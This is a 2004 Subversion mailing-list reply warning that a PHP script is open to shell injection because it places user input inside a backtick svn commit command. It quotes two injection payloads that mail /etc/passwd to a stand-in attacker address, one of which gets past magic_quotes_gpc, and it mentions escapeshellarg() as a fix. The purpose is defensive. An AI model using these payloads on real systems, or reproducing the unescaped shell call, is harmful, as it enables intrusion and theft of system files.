Re: PHP hack under way

From: Florian Weimer <fw_at_deneb.enyo.de>
Date: 2004-02-14 12:10:08 CET

Brian W. Fitzpatrick wrote:

> > $response = `svn commit -m \"$message\"`;

> I don't know offhand, but I suspect that you may be opening up a
> security hole the size of Texas by doing this. What if message is
> actually equal to
>
> "foo\" ; mail evilhaxor@example.com < /etc/passwd"
>
> or something worse.

With magic_quotes_gpc, this doesn't work, but

$(mail evilhaxor@example.com < /etc/passwd)

probably does...

You could use escapeshellarg() and similar functions to preprocess the
argument, but I don't understand the C source code and still have an
uneasy feeling about them.

---------------------------------------------------------------------
To unsubscribe, e-mail: users-unsubscribe@subversion.tigris.org
For additional commands, e-mail: users-help@subversion.tigris.org
Received on Sat Feb 14 12:10:38 2004

This message: [ Message body ]
Next message: kfogel_at_collab.net: "Re: wedged repository"
Previous message: Osuka Adartse: "Msys support? svn-win32-0.37.0"
In reply to: Brian W. Fitzpatrick: "Re: PHP hack under way"
Next in thread: Bryan Simmons: "RE: PHP hack under way"

Contemporary messages sorted: [ By Date ] [ By Thread ] [ By Subject ] [ By Author ] [ By messages with attachments ]